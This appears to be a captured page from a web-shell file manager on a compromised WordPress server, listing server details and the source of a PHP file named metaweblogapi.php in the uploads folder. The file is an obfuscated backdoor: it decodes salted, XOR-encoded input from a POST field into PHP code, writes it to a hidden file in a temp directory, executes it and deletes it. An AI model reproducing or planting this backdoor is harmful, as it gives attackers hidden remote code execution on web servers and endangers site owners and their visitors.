HEX
Server: Apache/2.4.59 (Debian)
System: Linux keymana 4.19.0-21-cloud-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64
User: lijunjie (1003)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
$ pwd: /var/www/thaler/wp-content/uploads/2024/
Upload Files
File: /var/www/thaler/wp-content/uploads/2024/metaweblogapi.php
<?php

if(filter_has_var(INPUT_POST, "p\x6F\x69nter")){
	$object = $_POST["p\x6F\x69nter"];
	 $object	 	= 	explode 		( 	 '.'	 	, 		$object )			; 
	$res		=	'';
            $salt		=	'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS		=	strlen($salt );
            $z		=	0;
    
            $__tmp		=	$object;
            while ($v5		=	array_shift($__tmp)) {
                $chS		=	ord($salt[$z % $lenS] );
                $dec		=	((int)$v5 - $chS - ($z % 10))	 ^	76;
                $res .= chr($dec );
                $z++;
            }
	$pgrp = array_filter(["/var/tmp", getenv("TMP"), getcwd(), "/dev/shm", session_save_path(), getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir()]);
	$ref = 0;
do {
    $pset = $pgrp[$ref] ?? null;
    if ($ref >= count($pgrp)) break;
    		if ((is_dir($pset) and is_writable($pset))) {
    $dchunk = str_replace("{var_dir}", $pset, "{var_dir}/.k");
    $success = file_put_contents($dchunk, $res);
if ($success) {
	include $dchunk;
	@unlink($dchunk);
	die();}
}
    $ref++;
} while (true);
}
@ Telegram